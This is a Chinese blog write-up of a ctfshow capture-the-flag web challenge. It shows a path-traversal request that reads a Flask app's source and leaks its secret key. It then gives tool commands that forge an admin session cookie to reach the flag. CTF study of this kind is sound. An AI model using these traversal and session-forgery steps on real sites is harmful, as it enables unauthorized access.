ctfshow菜狗 web 抽老婆

已于 2023-05-12 16:39:48 修改
阅读量194 收藏
点赞数
分类专栏: ctfshow 菜狗 wp 文章标签: 网络安全
于 2023-05-12 16:39:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hypocrite2/article/details/130645081
版权

点击抽老婆页,按f12
发现下载目录:
<a class="layui-btn layui-btn-lg layui-btn-radius layui-btn-normal" href="/download?file=6a3e6e9719438f11020cff3b8fc1c521.jpg" style="width: 200px;">下载老婆</a>
通过把file=后面的内容更改可下载其他内容,可能存在目录穿越漏洞

#听G老师扯扯

http://a104680d-3612-4239-ab53-7801a695120d.challenge.ctf.show/download?file=index.php
尝试下载源码index.php
报错
File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 2548, in __call__
可以根据以上信息,获知:使用的是python的flask框架 #不懂

File "/app/app.py", line 41, in source
def source():
    filename=request.args.get('file')
    if 'flag' in filename:
        return jsonify({"msg":"你想干什么?"})
    else:
        return send_file('static/img/'+filename,as_attachment=True)
发现 "/app/app.py"路径,还有出题者的调戏msg

http://a104680d-3612-4239-ab53-7801a695120d.challenge.ctf.show/download?file=../../../app/app.py
下载源码 #不懂为什么../../../

其中getwifi()用于设置session,getflag()用于验证session #不懂

flag 的目录是:/secret_path_U_never_know

下载工具flask_session_cookie_manager3.py
https://github.com/noraj/flask-session-cookie-manager

看看说明:
usage: flask_session_cookie_manager{2,3}.py encode [-h] -s <string> -t <string>

optional arguments:
  -h, --help            show this help message and exit
  -s <string>, --secret-key <string>
                        Secret key
  -t <string>, --cookie-structure <string>
                        Session cookie structure

密钥根据app.py里:app.config['SECRET_KEY'] = 'tanji_is_A_boy_Yooooooooooooooooooooo!'

到flask_session_cookie_manager文件夹里,右键在终端打开,输入:

python flask_session_cookie_manager3.py encode -s 'tanji_is_A_boy_Yooooooooooooooooooooo!' -t "{'isadmin':True}" 

输出session: blablabla呵呵哒

访问/secret_path_U_never_know
http://02072b25-a490-4518-8121-63b910172f60.challenge.ctf.show/secret_path_U_never_know

怎么改session。。。

下载editthiscookie

https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg

另外解密session可以用:python flask_session_cookie_manager3.py decode -c ‘session值’
python flask_session_cookie_manager3.py decode -c 'eyJjdXJyZW50X3dpZmkiOiI2NGVkZjQ1ZWQxMzNmMzg4ZjcyNGMyNjZiMDc2NmQ1Zi5qcGciLCJpc2FkbWluIjpmYWxzZX0.ZF3tAg.REUSCpUorJZYYIT8f4Wg8xTOWIQ'
b'{"current_wifi":"64edf45ed133f388f724c266b0766d5f.jpg","isadmin":false}'
发现确实和当前下载的老婆64edf45ed133f388f724c266b0766d5f.jpg一样


 

hypocrite2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTFshow-杯-flask session伪造-老婆
qq_31415417的博客
01-02 1378
CTFshow-杯-flask session伪造-老婆
ctfshow-杯-老婆
qq_47804678的博客
12-05 1453
打开首先发现是一个图片下载(老婆们都很不错( ̄▽ ̄)*),感觉也没什么其他的东西,先F12看一下代码,发现有一处标注,感觉跟任意文件下载有关: (一开始的错误思路:)想着先扫一遍看看能不能发现啥,于是用dirsearch扫了一下, 发现了/console,访问显示需要PIN, 也没有什么提示不知道能不能爆破出来,先抓个包看看,发现返回的响应包中有,改一下值,改为true, 发现验证就通过了: 但是我不会了。。。。后来看了一下wp,发现这个思路是错的,还是应该从文件读取入手。于是先试一试读取flag:
CTFshow 杯之 老婆解题思路和流程
最新发布
weixin_58052886的博客
06-13 589
CTFshow 杯之 老婆解题思路和流程
ctfshow 老婆 wp
arcuied
11-29 444
ctfshow 老婆 wp
ctfshow 愚人杯&杯部分题目(flasksession伪造&ssti)
weixin_63231007的博客
04-11 1651
flask-session伪造 + 无过滤ssti命令执行 + php整数溢出
CTFshow-杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow 杯wp
m0_64815693的博客
11-14 4989
ctfshow 杯 wp
ctfshow-杯-WEB-wp
F1rstb100d
11-14 1330
ctfshow-杯-WEB-wp
CTFshow web方向 全
Jay17的博客
09-01 2472
CTFshow web方向 全
ctfshow杯wp
m0_62274649的博客
11-17 2378
杯wp
ctfshowwebwp
qq_63928796的博客
11-14 2094
比如b=cookie[a],所以post[b]然后令post等于c所以get[c],令get=d所以request[d]最后补上前面的数字就是request[d],最后执行的就是eval(d[6][0][7][5][8][0][9][4][4]);可以看到源码对于输入的限制是两个正则,要求要么是数字,要么是dir(gmpy2)中的内容。根据源码可知,address是用AES的ECB模式加密的,稍微查一下就可以知道,ECB模式一组密文对应一组明文,也就是说,可以通过改变密文的顺序从而改变解密后明文的顺序。
[CTFShow] 记一次Flask session伪造
YV_LING的博客
11-13 1798
双十一的时候,ctfshow搞了一个“杯”比赛,其中有道题印象比较深刻,在此记录一下。
CTFSHOWweb
羽的博客
11-13 8569
CTFSHOW web
ctfshowweb
09-07
ctfshowweb是一个CTF比赛中的一个项目,其中包含了多个题目和挑战。其中有一个题目叫做"web2 c0me_t0_s1gn",这是一个需要进行签到的题目。 在这个题目中,源码中没有对number2进行正则匹配校验,所以number2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值